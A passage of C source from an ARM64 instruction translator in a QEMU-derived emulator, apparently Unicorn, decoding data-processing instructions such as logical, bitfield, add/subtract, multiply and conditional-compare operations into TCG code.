ANDS */ tcg_rd = cpu_reg(s, rd); } else { tcg_rd = cpu_reg_sp(s, rd); } tcg_rn = cpu_reg(s, rn); if (!logic_imm_decode_wmask(&wmask, is_n, imms, immr)) { /* some immediate field values are reserved */ unallocated_encoding(s); return; } if (!sf) { wmask &= 0xffffffff; } switch (opc) { case 0x3: /* ANDS */ case 0x0: /* AND */ tcg_gen_andi_i64(tcg_ctx, tcg_rd, tcg_rn, wmask); is_and = true; break; case 0x1: /* ORR */ tcg_gen_ori_i64(tcg_ctx, tcg_rd, tcg_rn, wmask); break; case 0x2: /* EOR */ tcg_gen_xori_i64(tcg_ctx, tcg_rd, tcg_rn, wmask); break; default: assert(FALSE); /* must handle all above */ break; } if (!sf && !is_and) { /* zero extend final result; we know we can skip this for AND * since the immediate had the high 32 bits clear. */ tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); } if (opc == 3) { /* ANDS */ gen_logic_CC(tcg_ctx, sf, tcg_rd); } } /* * Move wide (immediate) * * 31 30 29 28 23 22 21 20 5 4 0 * +--+-----+-------------+-----+----------------+------+ * |sf| opc | 1 0 0 1 0 1 | hw | imm16 | Rd | * +--+-----+-------------+-----+----------------+------+ * * sf: 0 -> 32 bit, 1 -> 64 bit * opc: 00 -> N, 10 -> Z, 11 -> K * hw: shift/16 (0,16, and sf only 32, 48) */ static void disas_movw_imm(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); uint64_t imm = extract32(insn, 5, 16); int sf = extract32(insn, 31, 1); int opc = extract32(insn, 29, 2); int pos = extract32(insn, 21, 2) << 4; TCGv_i64 tcg_rd = cpu_reg(s, rd); TCGv_i64 tcg_imm; if (!sf && (pos >= 32)) { unallocated_encoding(s); return; } switch (opc) { case 0: /* MOVN */ case 2: /* MOVZ */ imm <<= pos; if (opc == 0) { imm = ~imm; } if (!sf) { imm &= 0xffffffffu; } tcg_gen_movi_i64(tcg_ctx, tcg_rd, imm); break; case 3: /* MOVK */ tcg_imm = tcg_const_i64(tcg_ctx, imm); tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_imm, pos, 16); tcg_temp_free_i64(tcg_ctx, tcg_imm); if (!sf) { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); } break; default: unallocated_encoding(s); break; } } /* Bitfield * 31 30 29 28 23 22 21 16 15 10 9 5 4 0 * +----+-----+-------------+---+------+------+------+------+ * | sf | opc | 1 0 0 1 1 0 | N | immr | imms | Rn | Rd | * +----+-----+-------------+---+------+------+------+------+ */ static void disas_bitfield(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int sf, n, opc, ri, si, rn, rd, bitsize, pos, len; TCGv_i64 tcg_rd, tcg_tmp; sf = extract32(insn, 31, 1); opc = extract32(insn, 29, 2); n = extract32(insn, 22, 1); ri = extract32(insn, 16, 6); si = extract32(insn, 
10, 6); rn = extract32(insn, 5, 5); rd = extract32(insn, 0, 5); bitsize = sf ? 64 : 32; if (sf != n || ri >= bitsize || si >= bitsize || opc > 2) { unallocated_encoding(s); return; } tcg_rd = cpu_reg(s, rd); /* Suppress the zero-extend for !sf. Since RI and SI are constrained to be smaller than bitsize, we'll never reference data outside the low 32-bits anyway. */ tcg_tmp = read_cpu_reg(s, rn, 1); /* Recognize simple(r) extractions. */ if (si >= ri) { /* Wd<s-r:0> = Wn<s:r> */ len = (si - ri) + 1; if (opc == 0) { /* SBFM: ASR, SBFX, SXTB, SXTH, SXTW */ tcg_gen_sextract_i64(tcg_ctx, tcg_rd, tcg_tmp, ri, len); goto done; } else if (opc == 2) { /* UBFM: UBFX, LSR, UXTB, UXTH */ tcg_gen_extract_i64(tcg_ctx, tcg_rd, tcg_tmp, ri, len); return; } /* opc == 1, BFXIL fall through to deposit */ tcg_gen_shri_i64(tcg_ctx, tcg_tmp, tcg_tmp, ri); pos = 0; } else { /* Handle the ri > si case with a deposit * Wd<32+s-r,32-r> = Wn<s:0> */ len = si + 1; pos = (bitsize - ri) & (bitsize - 1); } if (opc == 0 && len < ri) { /* SBFM: sign extend the destination field from len to fill the balance of the word. Let the deposit below insert all of those sign bits. */ tcg_gen_sextract_i64(tcg_ctx, tcg_tmp, tcg_tmp, 0, len); len = ri; } if (opc == 1) { /* BFM, BFXIL */ tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_tmp, pos, len); } else { /* SBFM or UBFM: We start with zero, and we haven't modified any bits outside bitsize, therefore the zero-extension below is unneeded. */ tcg_gen_deposit_z_i64(tcg_ctx, tcg_rd, tcg_tmp, pos, len); return; } done: if (!sf) { /* zero extend final result */ tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); } } /* Extract * 31 30 29 28 23 22 21 20 16 15 10 9 5 4 0 * +----+------+-------------+---+----+------+--------+------+------+ * | sf | op21 | 1 0 0 1 1 1 | N | o0 | Rm | imms | Rn | Rd | * +----+------+-------------+---+----+------+--------+------+------+ */ static void disas_extract(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int sf, n, rm, imm, rn, rd, bitsize, op21, op0; sf = extract32(insn, 31, 1); n = extract32(insn, 22, 1); rm = extract32(insn, 16, 5); imm = extract32(insn, 10, 6); rn = extract32(insn, 5, 5); rd = extract32(insn, 0, 5); op21 = extract32(insn, 29, 2); op0 = extract32(insn, 21, 1); bitsize = sf ? 64 : 32; if (sf != n || op21 || op0 || imm >= bitsize) { unallocated_encoding(s); } else { TCGv_i64 tcg_rd, tcg_rm, tcg_rn; tcg_rd = cpu_reg(s, rd); if (unlikely(imm == 0)) { /* tcg shl_i32/shl_i64 is undefined for 32/64 bit shifts, * so an extract from bit 0 is a special case. */ if (sf) { tcg_gen_mov_i64(tcg_ctx, tcg_rd, cpu_reg(s, rm)); } else { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, cpu_reg(s, rm)); } } else { tcg_rm = cpu_reg(s, rm); tcg_rn = cpu_reg(s, rn); if (sf) { /* Specialization to ROR happens in EXTRACT2. */ tcg_gen_extract2_i64(tcg_ctx, tcg_rd, tcg_rm, tcg_rn, imm); } else { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t0, tcg_rm); if (rm == rn) { tcg_gen_rotri_i32(tcg_ctx, t0, t0, imm); } else { TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t1, tcg_rn); tcg_gen_extract2_i32(tcg_ctx, t0, t0, t1, imm); tcg_temp_free_i32(tcg_ctx, t1); } tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, t0); tcg_temp_free_i32(tcg_ctx, t0); } } } } /* Data processing - immediate */ static void disas_data_proc_imm(DisasContext *s, uint32_t insn) { switch (extract32(insn, 23, 6)) { case 0x20: case 0x21: /* PC-rel. 
addressing */ disas_pc_rel_adr(s, insn); break; case 0x22: case 0x23: /* Add/subtract (immediate) */ disas_add_sub_imm(s, insn); break; case 0x24: /* Logical (immediate) */ disas_logic_imm(s, insn); break; case 0x25: /* Move wide (immediate) */ disas_movw_imm(s, insn); break; case 0x26: /* Bitfield */ disas_bitfield(s, insn); break; case 0x27: /* Extract */ disas_extract(s, insn); break; default: unallocated_encoding(s); break; } } /* Shift a TCGv src by TCGv shift_amount, put result in dst. * Note that it is the caller's responsibility to ensure that the * shift amount is in range (ie 0..31 or 0..63) and provide the ARM * mandated semantics for out of range shifts. */ static void shift_reg(TCGContext *tcg_ctx, TCGv_i64 dst, TCGv_i64 src, int sf, enum a64_shift_type shift_type, TCGv_i64 shift_amount) { switch (shift_type) { case A64_SHIFT_TYPE_LSL: tcg_gen_shl_i64(tcg_ctx, dst, src, shift_amount); break; case A64_SHIFT_TYPE_LSR: tcg_gen_shr_i64(tcg_ctx, dst, src, shift_amount); break; case A64_SHIFT_TYPE_ASR: if (!sf) { tcg_gen_ext32s_i64(tcg_ctx, dst, src); } tcg_gen_sar_i64(tcg_ctx, dst, sf ? src : dst, shift_amount); break; case A64_SHIFT_TYPE_ROR: if (sf) { tcg_gen_rotr_i64(tcg_ctx, dst, src, shift_amount); } else { TCGv_i32 t0, t1; t0 = tcg_temp_new_i32(tcg_ctx); t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, t0, src); tcg_gen_extrl_i64_i32(tcg_ctx, t1, shift_amount); tcg_gen_rotr_i32(tcg_ctx, t0, t0, t1); tcg_gen_extu_i32_i64(tcg_ctx, dst, t0); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } break; default: assert(FALSE); /* all shift types should be handled */ break; } if (!sf) { /* zero extend final result */ tcg_gen_ext32u_i64(tcg_ctx, dst, dst); } } /* Shift a TCGv src by immediate, put result in dst. * The shift amount must be in range (this should always be true as the * relevant instructions will UNDEF on bad shift immediates). */ static void shift_reg_imm(TCGContext *tcg_ctx, TCGv_i64 dst, TCGv_i64 src, int sf, enum a64_shift_type shift_type, unsigned int shift_i) { assert(shift_i < (sf ? 64 : 32)); if (shift_i == 0) { tcg_gen_mov_i64(tcg_ctx, dst, src); } else { TCGv_i64 shift_const; shift_const = tcg_const_i64(tcg_ctx, shift_i); shift_reg(tcg_ctx, dst, src, sf, shift_type, shift_const); tcg_temp_free_i64(tcg_ctx, shift_const); } } /* Logical (shifted register) * 31 30 29 28 24 23 22 21 20 16 15 10 9 5 4 0 * +----+-----+-----------+-------+---+------+--------+------+------+ * | sf | opc | 0 1 0 1 0 | shift | N | Rm | imm6 | Rn | Rd | * +----+-----+-----------+-------+---+------+--------+------+------+ */ static void disas_logic_reg(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_rd, tcg_rn, tcg_rm; unsigned int sf, opc, shift_type, invert, rm, shift_amount, rn, rd; sf = extract32(insn, 31, 1); opc = extract32(insn, 29, 2); shift_type = extract32(insn, 22, 2); invert = extract32(insn, 21, 1); rm = extract32(insn, 16, 5); shift_amount = extract32(insn, 10, 6); rn = extract32(insn, 5, 5); rd = extract32(insn, 0, 5); if (!sf && (shift_amount & (1 << 5))) { unallocated_encoding(s); return; } tcg_rd = cpu_reg(s, rd); if (opc == 1 && shift_amount == 0 && shift_type == 0 && rn == 31) { /* Unshifted ORR and ORN with WZR/XZR is the standard encoding for * register-register MOV and MVN, so it is worth special casing. 
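* For example, ORR Xd, XZR, Xm is MOV Xd, Xm, and ORN Wd, WZR, Wm
* is MVN Wd, Wm.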
*/ tcg_rm = cpu_reg(s, rm); if (invert) { tcg_gen_not_i64(tcg_ctx, tcg_rd, tcg_rm); if (!sf) { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); } } else { if (sf) { tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_rm); } else { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rm); } } return; } tcg_rm = read_cpu_reg(s, rm, sf); if (shift_amount) { shift_reg_imm(tcg_ctx, tcg_rm, tcg_rm, sf, shift_type, shift_amount); } tcg_rn = cpu_reg(s, rn); switch (opc | (invert << 2)) { case 0: /* AND */ case 3: /* ANDS */ tcg_gen_and_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); break; case 1: /* ORR */ tcg_gen_or_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); break; case 2: /* EOR */ tcg_gen_xor_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); break; case 4: /* BIC */ case 7: /* BICS */ tcg_gen_andc_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); break; case 5: /* ORN */ tcg_gen_orc_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); break; case 6: /* EON */ tcg_gen_eqv_i64(tcg_ctx, tcg_rd, tcg_rn, tcg_rm); break; default: assert(FALSE); break; } if (!sf) { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); } if (opc == 3) { gen_logic_CC(tcg_ctx, sf, tcg_rd); } } /* * Add/subtract (extended register) * * 31|30|29|28 24|23 22|21|20 16|15 13|12 10|9 5|4 0| * +--+--+--+-----------+-----+--+-------+------+------+----+----+ * |sf|op| S| 0 1 0 1 1 | opt | 1| Rm |option| imm3 | Rn | Rd | * +--+--+--+-----------+-----+--+-------+------+------+----+----+ * * sf: 0 -> 32bit, 1 -> 64bit * op: 0 -> add , 1 -> sub * S: 1 -> set flags * opt: 00 * option: extension type (see DecodeRegExtend) * imm3: optional shift to Rm * * Rd = Rn + LSL(extend(Rm), amount) */ static void disas_add_sub_ext_reg(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int imm3 = extract32(insn, 10, 3); int option = extract32(insn, 13, 3); int rm = extract32(insn, 16, 5); int opt = extract32(insn, 22, 2); bool setflags = extract32(insn, 29, 1); bool sub_op = extract32(insn, 30, 1); bool sf = extract32(insn, 31, 1); TCGv_i64 tcg_rm, tcg_rn; /* temps */ TCGv_i64 tcg_rd; TCGv_i64 tcg_result; if (imm3 > 4 || opt != 0) { unallocated_encoding(s); return; } /* non-flag setting ops may use SP */ if (!setflags) { tcg_rd = cpu_reg_sp(s, rd); } else { tcg_rd = cpu_reg(s, rd); } tcg_rn = read_cpu_reg_sp(s, rn, sf); tcg_rm = read_cpu_reg(s, rm, sf); ext_and_shift_reg(tcg_ctx, tcg_rm, tcg_rm, option, imm3); tcg_result = tcg_temp_new_i64(tcg_ctx); if (!setflags) { if (sub_op) { tcg_gen_sub_i64(tcg_ctx, tcg_result, tcg_rn, tcg_rm); } else { tcg_gen_add_i64(tcg_ctx, tcg_result, tcg_rn, tcg_rm); } } else { if (sub_op) { gen_sub_CC(tcg_ctx, sf, tcg_result, tcg_rn, tcg_rm); } else { gen_add_CC(tcg_ctx, sf, tcg_result, tcg_rn, tcg_rm); } } if (sf) { tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_result); } else { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_result); } tcg_temp_free_i64(tcg_ctx, tcg_result); } /* * Add/subtract (shifted register) * * 31 30 29 28 24 23 22 21 20 16 15 10 9 5 4 0 * +--+--+--+-----------+-----+--+-------+---------+------+------+ * |sf|op| S| 0 1 0 1 1 |shift| 0| Rm | imm6 | Rn | Rd | * +--+--+--+-----------+-----+--+-------+---------+------+------+ * * sf: 0 -> 32bit, 1 -> 64bit * op: 0 -> add , 1 -> sub * S: 1 -> set flags * shift: 00 -> LSL, 01 -> LSR, 10 -> ASR, 11 -> RESERVED * imm6: Shift amount to apply to Rm before the add/sub */ static void disas_add_sub_reg(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int imm6 = extract32(insn, 10, 6); int rm = 
extract32(insn, 16, 5); int shift_type = extract32(insn, 22, 2); bool setflags = extract32(insn, 29, 1); bool sub_op = extract32(insn, 30, 1); bool sf = extract32(insn, 31, 1); TCGv_i64 tcg_rd = cpu_reg(s, rd); TCGv_i64 tcg_rn, tcg_rm; TCGv_i64 tcg_result; if ((shift_type == 3) || (!sf && (imm6 > 31))) { unallocated_encoding(s); return; } tcg_rn = read_cpu_reg(s, rn, sf); tcg_rm = read_cpu_reg(s, rm, sf); shift_reg_imm(tcg_ctx, tcg_rm, tcg_rm, sf, shift_type, imm6); tcg_result = tcg_temp_new_i64(tcg_ctx); if (!setflags) { if (sub_op) { tcg_gen_sub_i64(tcg_ctx, tcg_result, tcg_rn, tcg_rm); } else { tcg_gen_add_i64(tcg_ctx, tcg_result, tcg_rn, tcg_rm); } } else { if (sub_op) { gen_sub_CC(tcg_ctx, sf, tcg_result, tcg_rn, tcg_rm); } else { gen_add_CC(tcg_ctx, sf, tcg_result, tcg_rn, tcg_rm); } } if (sf) { tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_result); } else { tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_result); } tcg_temp_free_i64(tcg_ctx, tcg_result); } /* Data-processing (3 source) * * 31 30 29 28 24 23 21 20 16 15 14 10 9 5 4 0 * +--+------+-----------+------+------+----+------+------+------+ * |sf| op54 | 1 1 0 1 1 | op31 | Rm | o0 | Ra | Rn | Rd | * +--+------+-----------+------+------+----+------+------+------+ */ static void disas_data_proc_3src(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int ra = extract32(insn, 10, 5); int rm = extract32(insn, 16, 5); int op_id = (extract32(insn, 29, 3) << 4) | (extract32(insn, 21, 3) << 1) | extract32(insn, 15, 1); bool sf = extract32(insn, 31, 1); bool is_sub = extract32(op_id, 0, 1); bool is_high = extract32(op_id, 2, 1); bool is_signed = false; TCGv_i64 tcg_op1; TCGv_i64 tcg_op2; TCGv_i64 tcg_tmp; /* Note that op_id is sf:op54:op31:o0 so it includes the 32/64 size flag */ switch (op_id) { case 0x42: /* SMADDL */ case 0x43: /* SMSUBL */ case 0x44: /* SMULH */ is_signed = true; break; case 0x0: /* MADD (32bit) */ case 0x1: /* MSUB (32bit) */ case 0x40: /* MADD (64bit) */ case 0x41: /* MSUB (64bit) */ case 0x4a: /* UMADDL */ case 0x4b: /* UMSUBL */ case 0x4c: /* UMULH */ break; default: unallocated_encoding(s); return; } if (is_high) { TCGv_i64 low_bits = tcg_temp_new_i64(tcg_ctx); /* low bits discarded */ TCGv_i64 tcg_rd = cpu_reg(s, rd); TCGv_i64 tcg_rn = cpu_reg(s, rn); TCGv_i64 tcg_rm = cpu_reg(s, rm); if (is_signed) { tcg_gen_muls2_i64(tcg_ctx, low_bits, tcg_rd, tcg_rn, tcg_rm); } else { tcg_gen_mulu2_i64(tcg_ctx, low_bits, tcg_rd, tcg_rn, tcg_rm); } tcg_temp_free_i64(tcg_ctx, low_bits); return; } tcg_op1 = tcg_temp_new_i64(tcg_ctx); tcg_op2 = tcg_temp_new_i64(tcg_ctx); tcg_tmp = tcg_temp_new_i64(tcg_ctx); if (op_id < 0x42) { tcg_gen_mov_i64(tcg_ctx, tcg_op1, cpu_reg(s, rn)); tcg_gen_mov_i64(tcg_ctx, tcg_op2, cpu_reg(s, rm)); } else { if (is_signed) { tcg_gen_ext32s_i64(tcg_ctx, tcg_op1, cpu_reg(s, rn)); tcg_gen_ext32s_i64(tcg_ctx, tcg_op2, cpu_reg(s, rm)); } else { tcg_gen_ext32u_i64(tcg_ctx, tcg_op1, cpu_reg(s, rn)); tcg_gen_ext32u_i64(tcg_ctx, tcg_op2, cpu_reg(s, rm)); } } if (ra == 31 && !is_sub) { /* Special-case MADD with rA == XZR; it is the standard MUL alias */ tcg_gen_mul_i64(tcg_ctx, cpu_reg(s, rd), tcg_op1, tcg_op2); } else { tcg_gen_mul_i64(tcg_ctx, tcg_tmp, tcg_op1, tcg_op2); if (is_sub) { tcg_gen_sub_i64(tcg_ctx, cpu_reg(s, rd), cpu_reg(s, ra), tcg_tmp); } else { tcg_gen_add_i64(tcg_ctx, cpu_reg(s, rd), cpu_reg(s, ra), tcg_tmp); } } if (!sf) { tcg_gen_ext32u_i64(tcg_ctx, cpu_reg(s, rd), cpu_reg(s, rd)); } tcg_temp_free_i64(tcg_ctx, tcg_op1); 
tcg_temp_free_i64(tcg_ctx, tcg_op2); tcg_temp_free_i64(tcg_ctx, tcg_tmp); } /* Add/subtract (with carry) * 31 30 29 28 27 26 25 24 23 22 21 20 16 15 10 9 5 4 0 * +--+--+--+------------------------+------+-------------+------+-----+ * |sf|op| S| 1 1 0 1 0 0 0 0 | rm | 0 0 0 0 0 0 | Rn | Rd | * +--+--+--+------------------------+------+-------------+------+-----+ */ static void disas_adc_sbc(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int sf, op, setflags, rm, rn, rd; TCGv_i64 tcg_y, tcg_rn, tcg_rd; sf = extract32(insn, 31, 1); op = extract32(insn, 30, 1); setflags = extract32(insn, 29, 1); rm = extract32(insn, 16, 5); rn = extract32(insn, 5, 5); rd = extract32(insn, 0, 5); tcg_rd = cpu_reg(s, rd); tcg_rn = cpu_reg(s, rn); if (op) { tcg_y = new_tmp_a64(s); tcg_gen_not_i64(tcg_ctx, tcg_y, cpu_reg(s, rm)); } else { tcg_y = cpu_reg(s, rm); } if (setflags) { gen_adc_CC(tcg_ctx, sf, tcg_rd, tcg_rn, tcg_y); } else { gen_adc(tcg_ctx, sf, tcg_rd, tcg_rn, tcg_y); } } /* * Rotate right into flags * 31 30 29 21 15 10 5 4 0 * +--+--+--+-----------------+--------+-----------+------+--+------+ * |sf|op| S| 1 1 0 1 0 0 0 0 | imm6 | 0 0 0 0 1 | Rn |o2| mask | * +--+--+--+-----------------+--------+-----------+------+--+------+ */ static void disas_rotate_right_into_flags(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int mask = extract32(insn, 0, 4); int o2 = extract32(insn, 4, 1); int rn = extract32(insn, 5, 5); int imm6 = extract32(insn, 15, 6); int sf_op_s = extract32(insn, 29, 3); TCGv_i64 tcg_rn; TCGv_i32 nzcv; if (sf_op_s != 5 || o2 != 0 || !dc_isar_feature(aa64_condm_4, s)) { unallocated_encoding(s); return; } tcg_rn = read_cpu_reg(s, rn, 1); tcg_gen_rotri_i64(tcg_ctx, tcg_rn, tcg_rn, imm6); nzcv = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, nzcv, tcg_rn); if (mask & 8) { /* N */ tcg_gen_shli_i32(tcg_ctx, tcg_ctx->cpu_NF, nzcv, 31 - 3); } if (mask & 4) { /* Z */ tcg_gen_not_i32(tcg_ctx, tcg_ctx->cpu_ZF, nzcv); tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_ZF, 4); } if (mask & 2) { /* C */ tcg_gen_extract_i32(tcg_ctx, tcg_ctx->cpu_CF, nzcv, 1, 1); } if (mask & 1) { /* V */ tcg_gen_shli_i32(tcg_ctx, tcg_ctx->cpu_VF, nzcv, 31 - 0); } tcg_temp_free_i32(tcg_ctx, nzcv); } /* * Evaluate into flags * 31 30 29 21 15 14 10 5 4 0 * +--+--+--+-----------------+---------+----+---------+------+--+------+ * |sf|op| S| 1 1 0 1 0 0 0 0 | opcode2 | sz | 0 0 1 0 | Rn |o3| mask | * +--+--+--+-----------------+---------+----+---------+------+--+------+ */ static void disas_evaluate_into_flags(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int o3_mask = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int o2 = extract32(insn, 15, 6); int sz = extract32(insn, 14, 1); int sf_op_s = extract32(insn, 29, 3); TCGv_i32 tmp; int shift; if (sf_op_s != 1 || o2 != 0 || o3_mask != 0xd || !dc_isar_feature(aa64_condm_4, s)) { unallocated_encoding(s); return; } shift = sz ? 
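/* SETF8/SETF16 (s = 8 or 16) set N = operand<s-1>,
 * Z = IsZero(operand<s-1:0>) and V = operand<s> EOR operand<s-1>,
 * leaving C untouched: the shifts below move those bits into bit 31
 * of NF/VF, and ZF tests the shifted value against zero.
 */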
16 : 24; /* SETF16 or SETF8 */ tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, tmp, cpu_reg(s, rn)); tcg_gen_shli_i32(tcg_ctx, tcg_ctx->cpu_NF, tmp, shift); tcg_gen_shli_i32(tcg_ctx, tcg_ctx->cpu_VF, tmp, shift - 1); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); tcg_gen_xor_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); tcg_temp_free_i32(tcg_ctx, tmp); } /* Conditional compare (immediate / register) * 31 30 29 28 27 26 25 24 23 22 21 20 16 15 12 11 10 9 5 4 3 0 * +--+--+--+------------------------+--------+------+----+--+------+--+-----+ * |sf|op| S| 1 1 0 1 0 0 1 0 |imm5/rm | cond |i/r |o2| Rn |o3|nzcv | * +--+--+--+------------------------+--------+------+----+--+------+--+-----+ * [1] y [0] [0] */ static void disas_cc(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int sf, op, y, cond, rn, nzcv, is_imm; TCGv_i32 tcg_t0, tcg_t1, tcg_t2; TCGv_i64 tcg_tmp, tcg_y, tcg_rn; DisasCompare c; if (!extract32(insn, 29, 1)) { unallocated_encoding(s); return; } if (insn & (1 << 10 | 1 << 4)) { unallocated_encoding(s); return; } sf = extract32(insn, 31, 1); op = extract32(insn, 30, 1); is_imm = extract32(insn, 11, 1); y = extract32(insn, 16, 5); /* y = rm (reg) or imm5 (imm) */ cond = extract32(insn, 12, 4); rn = extract32(insn, 5, 5); nzcv = extract32(insn, 0, 4); /* Set T0 = !COND. */ tcg_t0 = tcg_temp_new_i32(tcg_ctx); arm_test_cc(tcg_ctx, &c, cond); tcg_gen_setcondi_i32(tcg_ctx, tcg_invert_cond(c.cond), tcg_t0, c.value, 0); arm_free_cc(tcg_ctx, &c); /* Load the arguments for the new comparison. */ if (is_imm) { tcg_y = new_tmp_a64(s); tcg_gen_movi_i64(tcg_ctx, tcg_y, y); } else { tcg_y = cpu_reg(s, y); } tcg_rn = cpu_reg(s, rn); /* Set the flags for the new comparison. */ tcg_tmp = tcg_temp_new_i64(tcg_ctx); if (op) { gen_sub_CC(tcg_ctx, sf, tcg_tmp, tcg_rn, tcg_y); } else { gen_add_CC(tcg_ctx, sf, tcg_tmp, tcg_rn, tcg_y); } tcg_temp_free_i64(tcg_ctx, tcg_tmp); /* If COND was false, force the flags to #nzcv. Compute two masks * to help with this: T1 = (COND ? 0 : -1), T2 = (COND ? -1 : 0). * For tcg hosts that support ANDC, we can make do with just T1. * In either case, allow the tcg optimizer to delete any unused mask. 
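* Example: when (nzcv & 8) requests N = 1, NF |= T1 is a no-op if
* COND held (T1 = 0) and forces NF to all-ones (sign bit set, so
* N reads as 1) if it did not.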
*/ tcg_t1 = tcg_temp_new_i32(tcg_ctx); tcg_t2 = tcg_temp_new_i32(tcg_ctx); tcg_gen_neg_i32(tcg_ctx, tcg_t1, tcg_t0); tcg_gen_subi_i32(tcg_ctx, tcg_t2, tcg_t0, 1); if (nzcv & 8) { /* N */ tcg_gen_or_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_NF, tcg_t1); } else { if (TCG_TARGET_HAS_andc_i32) { tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_NF, tcg_t1); } else { tcg_gen_and_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_NF, tcg_t2); } } if (nzcv & 4) { /* Z */ if (TCG_TARGET_HAS_andc_i32) { tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_ZF, tcg_t1); } else { tcg_gen_and_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_ZF, tcg_t2); } } else { tcg_gen_or_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_ZF, tcg_t0); } if (nzcv & 2) { /* C */ tcg_gen_or_i32(tcg_ctx, tcg_ctx->cpu_CF, tcg_ctx->cpu_CF, tcg_t0); } else { if (TCG_TARGET_HAS_andc_i32) { tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_CF, tcg_ctx->cpu_CF, tcg_t1); } else { tcg_gen_and_i32(tcg_ctx, tcg_ctx->cpu_CF, tcg_ctx->cpu_CF, tcg_t2); } } if (nzcv & 1) { /* V */ tcg_gen_or_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tcg_t1); } else { if (TCG_TARGET_HAS_andc_i32) { tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tcg_t1); } else { tcg_gen_and_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, tcg_t2); } } tcg_temp_free_i32(tcg_ctx, tcg_t0); tcg_temp_free_i32(tcg_ctx, tcg_t1); tcg_temp_free_i32(tcg_ctx, tcg_t2); } /* Conditional select * 31 30 29 28 21 20 16 15 12 11 10 9 5 4 0 * +----+----+---+-----------------+------+------+-----+------+------+ * | sf | op | S | 1 1 0 1 0 1 0 0 | Rm | cond | op2 | Rn | Rd | * +----+----+---+-----------------+------+------+-----+------+------+ */ static void disas_cond_select(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int sf, else_inv, rm, cond, else_inc, rn, rd; TCGv_i64 tcg_rd, zero; DisasCompare64 c; if (extract32(insn, 29, 1) || extract32(insn, 11, 1)) { /* S == 1 or op2<1> == 1 */ unallocated_encoding(s); return; } sf = extract32(insn, 31, 1); else_inv = extract32(insn, 30, 1); rm = extract32(insn, 16, 5); cond = extract32(insn, 12, 4); else_inc = extract32(insn, 10, 1); rn = extract32(insn, 5, 5); rd = extract32(insn, 0, 5); tcg_rd = cpu_reg(s, rd); a64_test_cc(tcg_ctx, &c, cond); zero = tcg_const_i64(tcg_ctx, 0); if (rn == 31 && rm == 31 && (else_inc ^ else_inv)) { /* CSET & CSETM. 
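* Both are aliases of CSINC/CSINV with Rn = Rm = ZR and the condition
* field inverted: CSET materialises (cond ? 1 : 0) and CSETM
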